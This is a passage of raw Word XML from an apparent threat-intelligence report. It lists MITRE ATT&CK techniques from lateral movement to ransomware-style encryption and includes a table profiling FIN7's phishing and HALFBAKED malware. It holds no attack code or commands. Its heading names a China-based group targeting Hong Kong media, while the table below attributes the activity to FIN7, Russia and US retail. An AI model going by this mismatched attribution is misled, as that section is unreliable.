        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:VNC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F93CD99"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lastRenderedPageBreak/>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1210 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation of Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3443328F"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T1021.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:Remote Desktop Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F778D6"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T1021.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E357E7"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1005', 'T1113', 'T1125']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAFE833"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1005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736BB79B" w14:textId="77777777" w:rsidR="00DF1D2D" w:rsidRPr="000D6859" w:rsidRDefault="00DF1D2D" w:rsidP="00DF1D2D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="000D6859">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D6859">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1113 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D6859">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Screen Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066F9ACE"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1125 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Video Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0292727C"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1008', 'T1571', 'T1102.002', 'T1071.004', 'T1105']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473EA184"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1008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Fallback Channels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C70DB6"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1571 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Non-Standard Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1765D7E9"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8B3AF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1102.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008B3AF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Web Service&gt;:Bidirectional Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3918C27D"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T1071.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E9FBC6" w14:textId="77777777" w:rsidR="00DF1D2D" w:rsidRPr="005A37A5" w:rsidRDefault="00DF1D2D" w:rsidP="00DF1D2D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="005A37A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A37A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A37A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6C7D8B"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration ['T1567.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69193A8D" w14:textId="77777777" w:rsidR="00DF1D2D" w:rsidRPr="00DF1D2D"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1567.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Exfiltration Over Web Service&gt;:Exfiltration to Cloud Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E81336" w14:textId="77777777" w:rsidR="00DF1D2D" w:rsidRPr="00DF1D2D" w:rsidRDefault="00DF1D2D" w:rsidP="00DF1D2D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact ['T1486']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E9F42" w14:textId="6D35A5E1" w:rsidR="005369E4" w:rsidRPr="005935F8" w:rsidRDefault="00DF1D2D" w:rsidP="00DF1D2D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1486 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data Encrypted for Impact</w:t>
      </w:r>
      <w:r w:rsidR="005369E4" w:rsidRPr="005935F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060A8056" w14:textId="77777777" w:rsidR="005369E4" w:rsidRDefault="005369E4" w:rsidP="005369E4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc153480881"/>
      <w:r>
        <w:t xml:space="preserve">T1566.001 - </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4630">
        <w:t>China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w14:paraId="5BEA0E8D" w14:textId="77777777" w:rsidR="005369E4" w:rsidRDefault="005369E4" w:rsidP="005369E4">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5369E4" w:rsidRPr="002D1D50" w14:paraId="7A192FB1" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D3D109D" w14:textId="77777777" w:rsidR="005369E4" w:rsidRPr="002D1D50" w:rsidRDefault="005369E4" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="105" w:name="OLE_LINK18"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AB32542" w14:textId="77777777" w:rsidR="005369E4" w:rsidRPr="002D1D50" w:rsidRDefault="005369E4" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75A94717" w14:textId="77777777" w:rsidR="005369E4" w:rsidRPr="00387DCC" w:rsidRDefault="005369E4" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5FE0" w:rsidRPr="00B857D7" w14:paraId="60D79EC1" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AA8A47D" w14:textId="77777777" w:rsidR="001F5FE0" w:rsidRDefault="001F5FE0" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02BB1027" w14:textId="090D5554" w:rsidR="001F5FE0" w:rsidRDefault="001F5FE0" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>FIN7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D67593F" w14:textId="77777777" w:rsidR="001F5FE0" w:rsidRPr="00387DCC" w:rsidRDefault="001F5FE0" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005369E4" w:rsidRPr="00B857D7" w14:paraId="02B7807B" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3347A0B3" w14:textId="77777777" w:rsidR="005369E4" w:rsidRPr="007328DE" w:rsidRDefault="005369E4" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DECAF31" w14:textId="77777777" w:rsidR="005369E4" w:rsidRPr="007328DE" w:rsidRDefault="005369E4" w:rsidP="00BD10BB">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5C09E588" w14:textId="2864DDF3" w:rsidR="005369E4" w:rsidRPr="00387DCC" w:rsidRDefault="00947362" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00947362">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005369E4" w:rsidRPr="00B857D7" w14:paraId="3516A50F" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54C89BA4" w14:textId="77777777" w:rsidR="005369E4" w:rsidRDefault="005369E4" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F07BBD2" w14:textId="3BF6409B" w:rsidR="005369E4" w:rsidRPr="007328DE" w:rsidRDefault="00D40028" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56BD3E94" w14:textId="264CB538" w:rsidR="005369E4" w:rsidRPr="00387DCC" w:rsidRDefault="00D40028" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">TCERT (see also </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Car</w:t>
            </w:r>
            <w:r w:rsidR="00520B12">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>ban</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>ak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005369E4" w:rsidRPr="00B857D7" w14:paraId="2E3E99BD" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40C6FC80" w14:textId="77777777" w:rsidR="005369E4" w:rsidRDefault="005369E4" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CD1A25A" w14:textId="37292811" w:rsidR="005369E4" w:rsidRDefault="000A09D5" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>United States</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="014E2719" w14:textId="4EFAC484" w:rsidR="005369E4" w:rsidRPr="00387DCC" w:rsidRDefault="000A09D5" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:r w:rsidRPr="000A09D5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>primarily targeting the U.S. retail, restaurant, and hospitality sectors,</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005369E4" w:rsidRPr="00B857D7" w14:paraId="41650FE1" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="329CAF38" w14:textId="77777777" w:rsidR="005369E4" w:rsidRDefault="005369E4" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FFAC83B" w14:textId="2B3A937A" w:rsidR="005369E4" w:rsidRDefault="000A09D5" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Retail chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12E04934" w14:textId="2D37A158" w:rsidR="005369E4" w:rsidRPr="00387DCC" w:rsidRDefault="000A09D5" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[6]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A09D5" w:rsidRPr="00B857D7" w14:paraId="65D35F0F" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D1F0939" w14:textId="77777777" w:rsidR="000A09D5" w:rsidRDefault="000A09D5" w:rsidP="000A09D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AB1AB6C" w14:textId="79B6EE7A" w:rsidR="000A09D5" w:rsidRDefault="000A09D5" w:rsidP="000A09D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Damage (integrity and availability), Reputation (external to the target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E2C0ABB" w14:textId="5F94FC08" w:rsidR="000A09D5" w:rsidRDefault="000A09D5" w:rsidP="000A09D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:r w:rsidRPr="000A09D5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>financially-motivated threat group</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D0A0E4C" w14:textId="65F7B2D3" w:rsidR="000A09D5" w:rsidRDefault="008315FD" w:rsidP="000A09D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="008315FD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="105"/>
      <w:tr w:rsidR="005369E4" w:rsidRPr="00B857D7" w14:paraId="3BB11AC8" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
